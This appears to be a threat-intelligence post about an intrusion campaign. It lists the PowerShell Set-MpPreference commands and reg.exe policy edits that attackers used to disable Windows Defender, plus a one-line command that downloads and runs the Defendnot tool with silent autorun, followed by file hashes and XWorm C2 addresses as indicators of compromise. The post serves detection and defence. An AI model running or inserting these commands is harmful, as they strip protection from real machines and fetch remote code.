Disabling Defender / MpPreference
More in General
- Operation Chewbacca
At the end of June, the PT ESC team, during incident investigations, discovered a new group…
- Ding, ding — who's there?
Ding, ding — who's there? 🔔 The cyber intelligence group of Positive Technologies' expert security center…
- Enterprise-grade validation system with schema support
Enterprise-grade validation system with schema support (c) The author of a dozen trojans who forgot to…
- One less feathered thief — plus one hundred rating points!
One less feathered thief — plus one hundred rating points! 😵 The Threat Intelligence team at…
- DragonDoll: a matryoshka in the world of Android spies
DragonDoll: a matryoshka in the world of Android spies 🪆 At the beginning of this spring,…
Disabling Defender / MpPreference
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableBlockAtFirstSeen $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableScriptScanning $true
Add-MpPreference -ExclusionPath 'C:\ProgramData'
Add-MpPreference -ExclusionPath $env:USERPROFILE'\Downloads'Code language: PowerShell (powershell)Modifying Defender via reg.exe
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /fCode language: plaintext (plaintext)Defendnot
#Default directory
C:\Prorgam Files\defendnot\
#Downloading and running Defendnot
irm https://dnot.sh/ | iex
#Running Defendnot in silent mode and adding a task to autorun under the current user
"C:\Program Files\defendnot\defendnot-loader.exe" --silent --autorun-as-userCode language: YAML (yaml)IoCs:
Defendnot
dnot.sh
734d301654affee77396b554ccb04e0e
752e74a143212b9779aa98ec6f736bac
C2 XWorm
tcp.cloudpub.ru:56409
fair-equation.gl.at.ply.gg:57489
lnk files
aebad92d84ae4f4b64748bc94798d401
abd0364a25d1e7ee2bc9320c74e125fc
powershell files
087dbfed9667fb870af265aed35f82e3
ef7b11685c154e54deaf5c26f6d8ea59
85a98d0f58cf08cb7206286b51312661
vbs\vbe files
0bbccecdd13c7b9c4af3273b1ae8e133
ebcb3e0d61ed5774d4e336f5e96ee9b4
9c5a00fe40783497752bcfbd75937fa7
3ec80f2d06dd8f6a8e60d0e8753255e7
xWorm
48bed9e98053e1e3ce0d4fb21fda2804
cab6f558f996db5a80e2a3bd5d443154
82294c916ba0ab95382509f51724716a
092712dc61fce5ef0ad0ddebb90059beCode language: YAML (yaml)#TI #Phishing #malware #win
@ptescalator
More in General
- Operation Chewbacca
At the end of June, the PT ESC team, during incident investigations, discovered a new group…
- Ding, ding — who's there?
Ding, ding — who's there? 🔔 The cyber intelligence group of Positive Technologies' expert security center…
- Enterprise-grade validation system with schema support
Enterprise-grade validation system with schema support (c) The author of a dozen trojans who forgot to…
- One less feathered thief — plus one hundred rating points!
One less feathered thief — plus one hundred rating points! 😵 The Threat Intelligence team at…
- DragonDoll: a matryoshka in the world of Android spies
DragonDoll: a matryoshka in the world of Android spies 🪆 At the beginning of this spring,…



